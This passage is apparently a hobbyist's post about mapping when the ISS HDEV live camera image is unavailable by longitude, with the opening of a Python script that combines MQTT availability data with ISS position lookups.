\0num write an 8-bit value that is the zero-, one-, two- or three-digit octal number num
echo is useful for producing diagnostics in command files and for sending known data into a pipe.
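The escape conventions above can be exercised from a command file; because the echo built into some shells follows the Berkeley semantics described under Notes and ignores these escapes, printf(1), which honors the same backslash sequences, is used here as a portable stand-in:

```shell
# \t and \n behave as in the table above.
printf 'Value:\t42\n'          # tab between "Value:" and "42"
# printf writes an octal escape as \nnn where this echo uses \0num;
# octal 101 is the ASCII code for "A".
printf '\101\n'                # prints "A"
```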
Notes
Berkeley echo differs from this implementation. The former does not implement the backslash escapes.
However, the semantics of the \c escape can be obtained by using the -n option. The echo command
implemented as a built-in function of csh follows the Berkeley semantics (see csh (1)).
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of arg as single- and/or multibyte characters. If it is not specified or contains an invalid setting, echo behaves as if all internationalization variables are set to "C". See environ (5).
AUTHOR
echo was developed by OSF and HP.
SEE ALSO
sh(1).
BUGS
No characters are printed after the first \c. This is not normally a problem.
STANDARDS CONFORMANCE
echo: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
ed(1) ed(1)
NAME
ed, red - line-oriented text editor
SYNOPSIS
ed [-p string ] [-s|-] [-x] [file ]
red [-p string ] [-s|-] [-x] [file ]
DESCRIPTION
The ed command executes a line-oriented text editor. It is most commonly used in scripts and noninteractive applications.
If, for example, the first line of a file contained the format specification
<:t5,10,15 s72:>
the tab stops would be set at columns 5, 10, and 15, and a maximum line length of 72 would be imposed.
Note: When you input text, ed expands tab characters as they are typed to every eighth column as a
default.
Regular Expressions
ed supports the Basic Regular Expression (RE) syntax (see regexp (5)), with the following additions:
• The null RE (for example, //) is equivalent to the last RE encountered.
• If the closing delimiter of an RE or of a replacement string (for example, /) would be the last
character before a newline, that delimiter can be omitted, in which case the addressed line is
printed. The following pairs of commands are equivalent:
Addresses are constructed according to the following rules:
1. The character . refers to the current line.
2. The character $ refers to the last line of the buffer.
5. An RE enclosed by slashes (/RE /) addresses the first line found by searching forward from the
line following the current line toward the end of the buffer and stopping at the first line contain-
ing a string matching the RE. If necessary, the search wraps around to the beginning of the
buffer and continues up to and including the current line, so that the entire buffer is searched.
(Also see WARNINGS below.)
6. An RE enclosed by question marks (?RE ?) addresses the first line found by searching back-
ward from the line preceding the current line toward the beginning of the buffer and stopping at
the first line containing a string matching the RE. If necessary, the search wraps around to the
end of the buffer and continues back to and including the current line, so that the entire buffer
is searched.
Addresses are usually separated from each other by a comma (,). They can also be separated by a
semicolon (;). Lines can be listed, numbered, or printed, as discussed below under the l, n, and p
commands.
(.)a
text
.
    The a (append) command reads text and appends it after the addressed line. Upon completion,
    the new current line is the last inserted line, or, if no text was added, the addressed line.
    Address 0 is legal for this command, causing the appended text to be placed at the beginning
    of the buffer.
(.,.)c
text
.
    The c (change) command deletes the addressed lines, then accepts input text to replace them.
The n command can be appended to any command other than e, f, r, or w.
When the character % is the only character in replacement , the replacement used in the
most recent substitute command is used as the replacement in the current substitute com-
mand. The % loses its special meaning when it is in a replacement string containing
more than one character or when preceded by a \.
A line can be split by substituting a newline character into it. The newline in the replacement
must be escaped by preceding it with a backslash (\).
n    Write to standard output the final line in which a substitution was made. The
     line is written in the format specified for the n command.
p    Write to standard output the final line in which a substitution was made. The
     line is written in the format specified for the p command.
u    The u (undo) command nullifies the effect of the most recent command that modified
     anything in the buffer, that is, the most recent a, c, d, g, G, i, j, m, r, s, t, v, or V
     command.
x    The x command prompts for an encryption key; an explicitly empty key turns off
     encryption.
($)= The line number of the addressed line is displayed. The current line address is
unchanged by this command.
EXTERNAL INFLUENCES
Environment Variables
If any internationalization variable contains an invalid setting, all internationalization variables
default to "C". See environ (5).
If LC_ALL is set to a nonempty string value, it overrides the values of all the other internationalization
variables, including LANG.
LC_CTYPE determines the interpretation of text as single- and/or multibyte characters.
ed allows a maximum line length of 4096 characters. Attempting to create lines longer than
the allowable limit causes ed to produce a "Line too long" error message.
If the editor input is coming from a command file (e.g., ed file < ed-cmd-file), the editor exits at
the first failure of a command in the command file.
When reading a file, ed discards ASCII NUL characters and all characters after the last newline. This
can cause unexpected behavior when using regular expressions to search for character sequences
containing these characters.
SEE ALSO
The ed section in Text Processing: User's Guide.
STANDARDS CONFORMANCE
ed: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
red: SVID2, SVID3, XPG2, XPG3
elfdump(1) elfdump(1)
NAME
elfdump - dump information contained in object files.
SYNOPSIS
elfdump [-acCdfghHjkLopqrsStuUvV] [-dc] [-dl] [-tx] [-tv] [-D num ] [+D num2 ]
[+interp] [+linkmap] [+linkmap_bss] [+linkmap_file] [-n name ] [+objdebug] [+s
section ] [-T num ] [+T num2 ] files ...
DESCRIPTION
elfdump takes one or more object files or libraries and dumps information about them. The following
options are supported:
-a Dumps archive headers from an archive library.
-c Dumps the string table(s).
-C (Modifier) Demangles C++ symbol names before printing them. This modifier is valid
with -c, -r, -s, and -t. If specified with -H, this modifier is ignored. If specified with
-n name, the symbol whose unmangled name matches name will be printed, and its symbol
name will be printed as a demangled name.
-d Prints the .note section which contains the compilation unit dictionary and linker foot-
print. This option has the same effect as elfdump -dc -dl.
-dc Prints the compilation unit dictionary of the .notes section.
-dl Prints the linker footprint of the .notes section. The linker footprint has information on
the linker used to generate the file as well as the link time.
-D num (Modifier) Prints the section whose index is num.
+D num2 (Modifier) Prints the sections in the range 1 to num2. If used with -D, the sections in the
range num to num2 are printed. Valid with -h, -r, -s. If used with -r, only the reloca-
tions which apply to the section(s) in the range are printed.
-f Dumps the file header (ELF header).
-g Dumps global symbols from an archive.
-h Dumps the section headers.
-H (Modifier) Dumps output information in hexadecimal, octal, or decimal format, with all
options.
+interp Displays the run-time interpreter path name for a.out (usually the location of the
dynamic loader and microloader). Only shared bound executables have this string. To
change the setting, use the ld +interp command.
-j Prints the object dictionary for one or more executable files, if the source file was com-
piled with the +objdebug option. The object dictionary entry contains the name of the
object file that contributed to a particular section, the relative offset within the section,
size of the object file’s contribution, and attributes of the entry.
-k Prints the CTTI section headers according to the directory member relationship.
-L Dumps the .dynamic section in shared libraries and dynamically linked program files.
+linkmap Prints the .linkmap section, which is only created when the incremental linker is used
(with the ld +ild command), or when the linker option +objdebug is used (which is
the default), along with the compiler option, -g (which is NOT the default).
+linkmap_bss
Prints the .linkmap_bss section, which is only created when the incremental linker is
used (with the ld +ild command), or when the linker option +objdebug is used
(which is the default), along with the compiler option, -g (which is NOT the default).
+linkmap_file
Prints the .linkmap_file section, which is only created when the incremental linker is
used (with the ld +ild command), or when the linker option +objdebug is used
(which is the default), along with the compiler option, -g (which is NOT the default).
-n name (Modifier) Dumps information about the specified section or symbol name. This option is
valid with -h, -r, -s, and -t. If used with -t, name pertains to a symbol name and
elfdump will only dump the symbol entry whose name matches name. If used with the
other options, name pertains to a section name and elfdump will only dump the section
whose name matches it.
-o Dumps the optional headers (program headers).
-p (Modifier) Do not print titles, with all options.
-q (Modifier) Suppresses printing CTTI section headers. Valid with -k option.
-r Dumps the relocations.
-s Dumps the section contents.
+objdebug Dumps any section beginning with .objdebug_ as a string table.
+s name (Modifier) Dumps the section specified by name. Valid with -c and -t only.
-S (Modifier) Dumps output information in short format. Valid with the -h and -o options.
-t Dumps the symbol table entries.
-tx Dumps the value of st_shndx in symbol table, in addition to information dump from -t
option. This option is useful to verify the data stored in the symbol table.
-T num Prints the symbol whose index is num.
+T num2 (Modifier) Prints the symbols in the range 0 to num2. If used with -T, print the symbols
in the range num to num2. Valid with -t.
-tv Prints versioned symbols.
-u Prints the usage menu.
-U Prints the unwind table.
-v (Modifier) Verifies the CTTI section headers before printing. Valid with the -k option.
-V Prints the version number for elfdump.
EXAMPLES
To see the functions exported from a shared library:
$ elfdump -s -n .dynsym libsubs.so | grep 'FUNC GLOB' | grep -v UNDEF
To see the global data items exported from a shared library:
$ elfdump -s -n .dynsym libsubs.so | grep 'OBJT GLOB' | grep -v UNDEF
To display string table information (.strtab):
$ elfdump -c subs.o
To list the shared libraries (.sl) linked with a program or shared library (dependent libraries):
$ elfdump -L a.out | grep Needed
$ chatr a.out # shared library list
To list the embedded path for shared libraries (.so) opened by a program:
$ elfdump -L a.out | grep Rpath # or
$ elfdump -s -n .dynamic a.out | grep Rpath
$ chatr a.out # embedded path
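The grep filters in the first two examples select defined, exported entries from elfdump's symbol-table listing; their logic can be checked against a canned line of output (the fields below are illustrative, not a verbatim elfdump record):

```shell
# One defined exported function and one undefined reference:
# only the defined symbol survives the FUNC GLOB / -v UNDEF pair.
printf '%s\n%s\n' \
    'sub_init   FUNC GLOB   .text   0x4000' \
    'printf     FUNC GLOB   UNDEF' |
    grep 'FUNC GLOB' | grep -v UNDEF    # prints only the sub_init line
```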
SEE ALSO
System Tools
ld(1) Invoke the link editor
Miscellaneous
a.out (4) Assembler, compiler, and linker output
elf (3E) Executable and Linking Format
elm(1) elm(1)
NAME
elm - process electronic mail through a screen-oriented interface
SYNOPSIS
elm [-aKkmtVz] [-f folder ]
elm [-s subject ] address-list
elm -c [alias-list ]
elm -h
elm -v
DESCRIPTION
The elm program is a screen-oriented electronic mail processing system. It supports the industry-wide
MIME standard for nontext mail, a special forms message and forms reply mechanism, and an easy-to-
use alias system for individuals and groups. elm operates in three principal modes:
• Interactive mode, running as an interactive mail interface program. (First syntax.)
• Message mode, sending a single interactive message to a list of mail addresses from a shell com-
mand line. (Second syntax.)
• File mode, sending a file or command output to a list of mail addresses via a command-line pipe or
redirection. (Second syntax.)
In all three cases, elm honors the values that are set in your elmrc initialization file, in your elm alias
database, and in the system elm alias database.
The modes are described below in inverse order (shortest description to longest).
Options
The following options are recognized:
-a Set arrow=ON. Use the arrow (->) instead of the inverse bar to mark the current
item in the various indexes. This overrides the setting of the arrow boolean vari-
able (see the ELM CONFIGURATION section).
-c Check alias. Check the aliases in alias-list against your personal elm alias data-
base and the system elm alias database. The results are written to standard out-
put. Errors are reported first, in the form:
(alias "alias" is unknown)
Successes are reported in a header-entry format, with group aliases replaced by
their members, in the form:
Expands to: alias-address (fullname ),
alias-address (fullname ),
...
alias-address (fullname )
If there is no fullname , the " (fullname )" portion is omitted.
-f folder Folder file. Read mail from the folder file rather than from the incoming mailbox.
A folder file is in the standard mail file format, as created by the mail system or
saved by elm itself.
-h Help. Display an annotated list of command-line options.
-k Set softkeys=OFF. Disable the use of softkeys (HP 2622 function keys). This
overrides the setting of the softkeys boolean variable (see the ELM CONFI-
GURATION section).
-K Set keypad=OFF and softkeys=OFF. Disable the use of softkeys and arrow cur-
sor keys. If your terminal does not have the HP 2622 function key protocols, this
option is required. This overrides the settings of the keypad and softkeys
boolean variables (see the ELM CONFIGURATION section).
-m Set menu=OFF. Do not display the command menus on several Interactive Mode
screens. This overrides the setting of the menu boolean variable (see the ELM
CONFIGURATION section).
-s subject Subject. Specify the subject for a File Mode or Message Mode message.
-t Set usetite=OFF. Do not use the termcap ti/te and terminfo cup cursor-
positioning entries. This overrides the setting of the usetite boolean variable
(see the ELM CONFIGURATION section).
-V Verbose transmission. Pass outbound messages to the sendmail mail transport
agent using the -v option (see sendmail (1M)).
-v Version. Print out the elm version information. This displays the version number
and the compilation features that were specified or omitted.
-z Zero. Do not enter elm if there is no mail in the incoming mailbox.
Operands
The following operands are recognized:
address-list A blank-separated list of one or more mail addresses, your elm user aliases, or elm
system aliases.
alias-list A blank-separated list of one or more of your elm user aliases or elm system
aliases.
Terminology
The following terms are used throughout this manpage.
blank A space or a tab character, sometimes known as linear white space.
body The body of a message. See message.
boolean variable
See configuration variable.
configuration variable
A boolean, numeric, or string variable that defines default behavior in the elm mail system.
See the ELM CONFIGURATION section.
elm system alias text file
The source file, /var/mail/.elm/aliases.text, for the elm system alias database.
elm user alias text file
The source file , $HOME/.elm/aliases.text, for a user’s own elm alias database.
elm user headers file
A file, $HOME/.elm/elmheaders, where a user can specify special header entries that are
included in all outbound messages.
elmrc configuration file
A file, $HOME/.elm/elmrc, that defines the initial values for elm configuration variables.
environment variable
A global variable set in the shell that called elm. See the EXTERNAL INFLUENCES section.
folder A file that contains mail messages in the format created by sendmail or elm.
full name
The first and last name of a user, as extracted from an alias text file or from the
/etc/passwd file.
header The header of a message. See message.
header entry
An entry in the header portion of a message, sometimes called a header field.
incoming mailbox
The mailbox where you receive your mail, usually /var/mail/loginname.
mail directory
The directory, defined by the maildir string variable, where a user normally stores mail
messages in folders.
FILE MODE
If standard input is connected to a pipe or to a file, and an address-list is specified, elm operates in File
Mode.
The output of the previous command in the pipe, or the content of the file, is mailed to the members of the
address-list . The address-list is expanded, based on your elm alias database and the system elm alias
database, and placed in the To: header entry.
If -s is omitted or subject is null, subject defaults to:
no subject (file transmission)
The expressed or default value of subject is placed in the Subject: header entry.
See the EXAMPLES section.
MESSAGE MODE
If standard input is connected to your terminal, and an address-list is specified, elm operates in Message
Mode.
The address-list is expanded, based on your elm alias database and the system elm alias database, and
placed in the To: header entry. The To: header entry is displayed, in the same form as for the Message
Menu m (mail) command in Interactive Mode.
The value of subject , if nonnull, or a null string, is placed in the Subject: header entry and the Sub-
ject: line is displayed for modification.
If askcc is ON in your elmrc file, you are prompted for Copies to:.
Then the editor defined by the editor string variable (if a signature file is not added) or the altedi-
tor string variable (if a signature file is added) is started so that you can write your message.
When you leave your editor, you enter the Send Menu, as described for Interactive Mode.
If you choose the Send Menu s (send) command, the message is sent and the program terminates. If you
select the Send Menu f (forget) command, the message is stored in $HOME/Canceled.mail and the
program terminates. If you select other commands, the appropriate action occurs.
See the EXAMPLES section.
INTERACTIVE MODE
If standard input is connected to your terminal, and there is no address-list , elm operates in a screen-
oriented Interactive Mode.
If you do not have a $HOME/.elm directory, or if you do not have a mail directory, defined by the mail-
dir string variable, you are asked in turn if they should be created. You can answer y for yes , n for no,
or q for quit . For y or n, the directories are created or not, as appropriate, and the program continues.
For q, the program terminates.
Overview
When invoked, elm reads customized variables from file $HOME/.elm/elmrc (if it exists) to initialize
parameters. This file can be saved from within elm and some of these variables can also be modified
with the Message Menu o (option) command.
elm first displays the Main or Message Menu, which shows index entries for the messages in your incom-
ing mailbox or selected mail folder. Among other options, you can read, print, reply to, and forward these
messages, as well as initiate new mail messages to other users.
You can also move to the Alias Menu, where you can create, modify, and delete your personal aliases.
From the Alias Menu, you can select one or more of your aliases and send a message to the corresponding
users.
When you send a message, you can include attachments in a number of formats, such as PostScript,
images, audio, and video, as well as plain text. The attachments are managed separately, which can be
convenient both for you and your correspondents.
Sending Messages
When you send a message, you use the editor defined by the editor or alteditor string variable. If
builtin is your editor, a set of commands described in the Built-In Editor subsection is available while
composing your message.
If the elmheaders file exists (see the HEADER FILE section), all nonblank lines in the file are copied to
the headers of all outbound mail. This is useful for adding special information headers such as
X-Organization:, X-Phone:, and so forth.
MIME Support
elm supports the MIME protocols for headers and messages (RFC 1521 and RFC 1522) enabling it to
view and send mail containing other than normal ASCII text. For example, the mail contents can be
audio, video, images, etc., or a combination of these.
This also enables conformance with SMTP (RFC 821), which allows only 7-bit characters in the message,
by using MIME-encoding (base64 and quoted-printable) to convert 8-bit data to 7-bit.
elm also provides a facility to view multipart MIME messages. If elm receives a message whose type is
not text/plain, it invokes metamail, which invokes the appropriate utility (for example, ghost-
view, xv, an audio editor, mpeg) to display the different mail parts according to the content type (for
example, application/postscript, image, audio, video).
Aliases
elm has its own alias system that supports both personal and system-wide aliases. Personal aliases are
specific to a single user; system aliases are available to everyone on the system where the system aliases
reside (see newalias (1)). You can access the Alias Menu by executing the Message Menu a (alias) com-
mand. You can then create and save an alias for the current message, create and check other aliases, and
send messages to one or more aliases.
Aliases are limited to 2500 bytes. If you wish to create a group alias that is longer than 2500 bytes,
please ask your system administrator to create it for you in the sendmail system alias file,
/etc/mail/aliases (see sendmail (1M)).
Message Menu
The Message Index is displayed on the Message Menu. You can use the following commands to manipu-
late and send messages. Some commands use a series of prompts to complete their action. You can use
Ctrl-D to cancel their operations.
The commands are:
!command Shell Escape. Send command to the shell defined by the shell string variable
without leaving elm.
# Display all known information about the current message.
$ Resynchronize the messages without leaving elm. If there are any messages
marked for deletion, you are asked if you want to delete them. If any messages are
deleted or any status flags have changed, the messages are written back to the mail-
box file. All tags are removed.
% Display the computed return address of the current message.
* Set the current message pointer to the last message.
+ Display the next message index page, when applicable.
- Display the previous message index page, when applicable.
/pattern Pattern match. Search for pattern in the from and subject fields of the current mes-
sage index. The search starts at the current message and wraps around to the
beginning of the index. The current message pointer is set to the first message that
matches. Uppercase and lowercase are treated as equivalent.
//pattern Pattern match. Search for pattern through all the lines of the current folder. The
search starts at the current message and wraps around to the beginning of the
folder. The current message pointer is set to the first message that matches.
Uppercase and lowercase are treated as equivalent.
< Calendar. Scan message for calendar entries and add them to your calendar file. A
calendar entry is defined as a line whose first nonblank characters are ->, as in:
->calendar-entry
The delimiter -> and surrounding blanks are removed before the entry is added to
the calendar file. Resultant blank lines are ignored. You can define the calendar
file name in your elmrc file or with the Options Menu.
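The extraction that the < command performs can be sketched with standard tools: keep the lines whose first nonblank characters are ->, then strip the delimiter and surrounding blanks. The file message.txt is hypothetical:

```shell
# Pull calendar entries out of a saved message the way < does.
cat > message.txt <<'EOF'
Hi there,
  -> 10am Friday: project review
unrelated line
-> lunch with Doug
EOF
sed -n 's/^[[:space:]]*->[[:space:]]*//p' message.txt
rm -f message.txt
```

This prints the two entries with their -> delimiters and leading blanks removed, which is what elm appends to the calendar file.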
= Set the current message pointer to the first message.
> Save in folder. Same as the Message Menu s (save) command.
?key ... Help on key. Display a one-line description of what each key does. ? displays a
summary listing for each command available. A period (.) returns you to the Mes-
sage Menu.
@ Display a summary of the messages indexed on the current screen.
| Pipe the current message or the set of tagged messages through other filters as
desired. Use the shell defined by the shell string variable.
n New current message. Change the current message pointer to the one indexed as n.
If the message is not on the current page of headers, the appropriate page is
displayed.
Return Read current message. The screen is cleared and the current message is displayed
by the pager defined by the pager string variable.
a Alias. Switch to the Alias Menu.
b Bounce mail. This is similar to forwarding a message, except that you do not edit
the message and the return address is set to the original sender’s address, rather
than to your address.
c Change folder. This command is used to change the file whose messages are
displayed on the Message Menu. You are asked for a file name. The file must be in
message format; otherwise, elm aborts. You can use the customary wildcards for
your shell, as well as the following special names:
! Your incoming mail folder.
> Your received folder, defined by the receivedmail string vari-
able.
< Your sent folder, defined by the sentmail string variable.
. The previously used folder.
@alias The default folder for the login name associated with the alias
alias.
=filename A file in the directory defined by the maildir string variable.
C Copy message. Save the current message or the set of tagged messages to a folder.
You are prompted for a file name with a default value. The default value is a file in
the maildir directory with the user name of the sender of the first message in the
set being saved. Any tags are cleared. Unlike the > and s commands, the messages
are not marked for deletion and the current message pointer is not moved.
d Delete. Mark the current message for deletion. See also Ctrl-D, u, and Ctrl-U.
Ctrl-D Delete. Mark all messages for deletion that contain a specified pattern in the
From: and Subject: header entries. See also d, u, and Ctrl-U.
e Edit. Allows you to physically edit the current mail folder using the editor defined
by the editor string variable. When you exit from your editor, elm resynchron-
izes your mail folder (see the $ command).
f Forward the current message. You are asked if you want to edit the outbound mes-
sage. If you answer y, the characters defined by the prefix string variable are
prefixed to each line of the message and the editor defined by the editor string
variable will be invoked to allow you to edit the message. If you answer n, the char-
acters are not prefixed and the editor will not be invoked. In either case, you are
prompted for To: recipients, allowed to edit the Subject: header entry, and, if
the askcc boolean variable is ON, you are prompted for Cc: recipients.
If the userlevel numeric variable is 1 (intermediate) or 2 (expert), and there
was a previous sent or forgotten message in this session, you are asked if you would
like to
Recall last kept message instead? (y/n)
If you answer y, the previous message is returned to the send buffer. If you answer
n, the current message is copied into the send buffer and your signature file (if any)
is appended.
Then the editor is invoked if you chose to edit the outbound message (above). When
you leave the editor, or if it was not invoked, the Send Menu is displayed.
g Group reply. The reply is automatically sent To: the sender of the message, with
Cc: to all the original To: and Cc: recipients. Otherwise, the action is the same
as for the r command.
h Same as Return, except that the message is displayed with all headers.
j Move down. Move the current message pointer down to the next message.
J Move down. Move the current message pointer down to the next undeleted mes-
sage.
k Move up. Move the current message pointer up to the previous message.
K Move up. Move the current message pointer up to the previous undeleted message.
l (ell) Limit the displayed messages to those that contain certain string values. You are
prompted with Enter criteria:. To set, add to, or clear the limiting criteria,
type one of:
all Clear all the criteria and restore the normal display.
from string Restrict to entries that contain string in the From: header.
subject string Restrict to entries that contain string in the Subject:
header.
to string Restrict to entries that contain string in the To: header.
You can add limiting criteria by repeating the l command.
Ctrl-L Redraw the screen.
m Mail. Send mail to one or more addresses. You are prompted for To: recipients, a
Subject: and, if the askcc boolean variable is ON, Cc: recipients.
If the userlevel numeric variable is 1 (intermediate) or 2 (expert), and there
was a previous sent or forgotten message in this session, you are asked if you would
like to
provided by the alwayskeep boolean variable (ON means y (yes) and OFF
means n (no)).
If you answer y, all undeleted unread (new and old) messages are returned to
your incoming mailbox.
If you answer n, all undeleted unread messages will be moved to the folder
defined by the receivedmail string variable.
If the ask boolean variable is OFF, the answers to the questions (which are not
displayed) are taken automatically from the values of the alwaysdelete,
alwaysstore, and alwayskeep boolean variables, respectively.
Q Quick quit. This is equivalent to executing the q command with the ask boolean
variable set to OFF.
r Reply to the sender of the current message. If the autocopy boolean variable is
OFF, you are asked if the source message should be copied into the edit buffer. If it
is ON, the message is copied automatically. If copied in, all lines from the message
are preceded by the prefix string defined by the prefix string variable. The To:
header is set to the sender of the message (or the address in the Reply-To:
header, if one was set), the Subject: is set to the subject of the message, preceded
by Re:, and presented for you to edit. If the askcc boolean variable is ON, you are
prompted for Cc: recipients. Then, the editor defined by the editor string vari-
able is invoked. After you exit from your editor, the Send Menu is displayed.
s Save in folder (same as >). Save the current message or the set of tagged messages
to a folder. You are prompted for a file name with a default value. The default
value is a file in the maildir directory with the login name of the sender of the
first message in the set being saved. Any tags are cleared and the messages are
marked for deletion. The current message pointer is moved to the first undeleted
message after the last saved message.
t Tag toggle. Tag the current message for a later operation and move the current
message pointer to the next undeleted message. The operation can be one of |, C,
p, and s.
Or, remove the tag from a tagged message. See also the Ctrl-T command.
T Tag toggle. Tag the current message for a later operation and remain at the current
message. The operation can be one of |, C, p, and s.
Or, remove the tag from a tagged message. See also the Ctrl-T command.
Ctrl-T Tag all messages containing the specified pattern. Or remove the tags from all
tagged messages.
If any messages are currently tagged, you are asked if the tags should be removed.
Answer y to remove the old tags; answer n to keep them. In either case, you are
prompted for a string to match in either the From: or Subject: line of each mes-
sage. All messages that match the criterion are tagged. If you enter a null string
(carriage-return alone), no more messages are tagged.
u Undelete. Remove the deletion mark from the current message. See also d, Ctrl-
D, and Ctrl-U.
Ctrl-U Undelete. Remove any deletion mark from all messages that contain a specified
pattern in the From: and Subject: header entries. See also d, Ctrl-D, and u.
v View attachments. Invoke the Attachment View Menu for the current message.
x Exit. Exit without changing the mailbox. If changes are pending, such as deletions,
you are asked if they can be abandoned. If you answer y, the changes are aban-
doned and the program terminates. If you answer n the exit is abandoned and you
return to the Message Menu command prompt.
X Exit immediately without changing the mailbox. All pending changes are aban-
doned.
Message Index
The messages in the current folder are indexed on the Message Menu, one per line, in the format:
sss num mmm d from (lines) subject
defined as:
sss A three-character status field, described in the Message Status subsection.
num The ordinal message index number.
mmm The month from the last Date: header entry, or from the From message header.
d The day from the last Date: header entry, or from the From message header.
from Either the sender name from the last From: header entry or from the From message
header.
lines The number of lines in the message.
subject The subject description from the first Subject: header entry, truncated to fit your
screen.
The current message index entry is either highlighted in inverse video or marked in the left margin with
an arrow (->). See the -a option in the Options subsection and the arrow string variable in the ELM
CONFIGURATION section.
Message Status
The first three characters of each message index entry describe the message status. Each can be blank or
one of the values described below in descending order of precedence.
When a message has more than one status flag of a particular type set, the highest-precedence indicator
is displayed on the index line. For example, if a forms message (F) is also marked as company
confidential (C), the C rather than the F status character is displayed.
? MIME. The message or its attachments is in a MIME format whose version is not supported.
Blank. Normal status.
Built-In Editor
When you are composing an outbound message with the builtin built-in editor, it prompts you for text
lines with an empty line. Enter a period (.) to end the message and continue with the Send Menu.
Built-in editor commands are lines that begin with an escape character, defined by the escape string
variable. The default escape character is tilde (˜).
Note: Some remote login programs use tilde as their default escape character when it is the first character
on a line. (You can tell, because the tilde does not print.) Usually, the tilde is transmitted when you
enter a second character that is not recognized by the program or when you enter a second tilde. See the
program documentation for further information.
The built-in editor commands are:
~! [command] Execute the shell command, if one is given (as in ˜!ls), or start an interac-
tive shell, using the shell defined by the shell string variable.
~< command Execute the shell command and place the output of the command into the edi-
tor buffer. For example, "˜< who" inserts the output of the who command in
your message.
~? Print a brief help menu.
~˜ Start a line with a single tilde (˜) character.
~b Prompt for changes to the Blind-Carbon-Copy (Bcc:) list.
~c Prompt for changes to the Carbon-Copy (Cc:) list.
~e Invoke the editor defined for the easyeditor string variable on the mes-
sage, if possible.
~f [options] Add the specified list of messages or the current message. This uses read-
mail which means that all readmail options are available (see read-
mail (1)).
~h Prompt for changes to all the available headers (To:, Cc:, Bcc:, and Sub-
ject:).
~m [options] Same as ˜f, but each line is prefixed with the current prefix. See the prefix
string variable.
~o Prompt for the name of an editor to use on the message.
~p Print out the message as typed in so far.
~r filename Include (read in) the contents of the specified file.
~s Prompt for changes to the Subject: line.
~t Prompt for changes to the To: list.
~v Invoke the editor defined for the visualeditor string variable on the mes-
sage, if possible.
Alias Menu
The Alias Menu is invoked with the Message Menu a command. The source text for your alias file is
stored in the file $HOME/.elm/aliases.text. You can edit this file directly or with the following
commands.
The aliases currently compiled into your database and the system database are displayed in an indexed
list similar to the Message Menu. The entry format is described in the Alias Index subsection. The index
is sorted in the order defined by the aliassortby string variable. | https://de.scribd.com/document/19344828/HPUX-Command-A-M | CC-MAIN-2019-26 | en | refinedweb |
getElementsByAttributeNS(ns, attrib, value )
- Return type: DOM NodeList
- Returns an array of all the child elements of the element that have the attribute namespace given by the first argument, the attribute name given by the second argument, and the value given by the third argument. If the namespace (first argument) is set to '*', elements with any attribute namespace will be retrieved. If the third argument is '*', the elements retrieved may have the attribute (second argument) set to any value.
- Note that this method is only available on XUL elements and is not part of the DOM. | https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XUL/Method/getElementsByAttributeNS | CC-MAIN-2019-26 | en | refinedweb |
The QAbstractEventDispatcher class provides an interface to manage Qt's event queue. More...
#include <QAbstractEventDispatcher>
Inherits QObject. The Qt Solutions archive includes a reimplementation of QAbstractEventDispatcher that merges Qt and Motif events together.
See also QEventLoop and QCoreApplication.
Typedef for a function with the signature
bool myEventFilter(void *message);
See also setEventFilter() and filterEvent().
Typedef for QPair<int, int>. The first component of the pair is the timer ID; the second component is the interval.
See also registeredTimers().
Constructs a new event dispatcher with the given parent.
Destroys the event dispatcher.
This signal is emitted before the event loop calls a function that could block.
See also awake().
This signal is emitted after the event loop returns from a function that could block.
See also wakeUp() and aboutToBlock().
See also setEventFilter().
Flushes the event queue. This normally returns almost immediately. Does nothing on platforms other than X11.
Returns true if there is an event waiting; otherwise returns false.
Returns a pointer to the event dispatcher object for the specified thread. If thread is zero, the current thread is used. If no event dispatcher exists for the specified thread, this function returns 0.
Note: If Qt is built without thread support, the thread argument is ignored.
Interrupts event dispatching; i.e. the event dispatcher will return from processEvents() as soon as possible. If the QEventLoop::WaitForMoreEvents flag is not set in flags, and no events are available, this function will return immediately.
Note: This function does not process events continuously; it returns after all available events are processed.
See also hasPendingEvents().
Registers notifier with the event loop. Subclasses must implement this method to tie a socket notifier into another event loop.
Registers a timer with the specified interval for the given object. Returns true if successful; otherwise returns false.
See also registerTimer() and unregisterTimers().
Unregisters all the timers associated with the given object. Returns true if all timers were successful removed; otherwise returns false.
See also unregisterTimer() and registeredTimers().
Wakes up the event loop.
Note: This function is thread-safe.
See also awake(). | https://doc.qt.io/archives/4.3/qabstracteventdispatcher.html | CC-MAIN-2019-26 | en | refinedweb |
Move scm.py into its own module in preparation for splitting it up
Created attachment 91833 [details]
Patch
Attachment 91833 [details] did not pass style-queue:
Failed to run "['Tools/Scripts/check-webkit-style', '--diff-files', u'Tools/ChangeLog', u'Tools/Scripts/webkitpy..." exit_code: 1
Traceback (most recent call last):
File "Tools/Scripts/check-webkit-style", line 51, in <module>
from webkitpy.style_references import detect_checkout
File "/mnt/git/webkit-style-queue/Tools/Scripts/webkitpy/style_references.py", line 47, in <module>
from webkitpy.common.checkout.scm import detect_scm_system
File "/mnt/git/webkit-style-queue/Tools/Scripts/webkitpy/common/checkout/scm/__init__.py", line 4, in <module>
from .scm import SCM, SVN, Git, CommitMessage, detect_scm_system, find_checkout_root, default_scm, AuthenticationError, AmbiguousCommitError, CheckoutNeedsUpdate
ImportError: No module named scm
If any of these errors are false positives, please file a bug against check-webkit-style.
Comment on attachment 91833 [details]
Patch
View in context:
> Tools/Scripts/webkitpy/test/main.py:153
> + # unittest.main has horrible error reporting when module imports are bad
> + # so we test import here to make debugging bad imports much easier.
> + for module in modules:
> + __import__(module)
Is this related?
(In reply to comment #3)
> (From update of attachment 91833 [details])
> View in context:
>
> > Tools/Scripts/webkitpy/test/main.py:153
> > + # unittest.main has horrible error reporting when module imports are bad
> > + # so we test import here to make debugging bad imports much easier.
> > + for module in modules:
> > + __import__(module)
>
> Is this related?
It made it possible to track down the import problems when making changes like this. It would have made tracking down your PIL problem super-easy.
Committed r85427: <> | https://bugs.webkit.org/show_bug.cgi?id=59884 | CC-MAIN-2019-26 | en | refinedweb |
What I got (red means: no live image available at that time/location):
Apparently, the live image is more or less consistently not available between some 38° east and 95° east. That's just based on one day, though, starting from unix timestamp 1534627704 (August 18th 2018, 21:28 UTC).
How I got there:
Here's a script that, whenever HDEV live image availability data is received via MQTT, requests the current ISS position from a web service and combines that information. The result is written to stdout, which I redirected to a file. I had this script running for 24 hours (it self-terminates after that period of time):
import urllib2
import json
import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
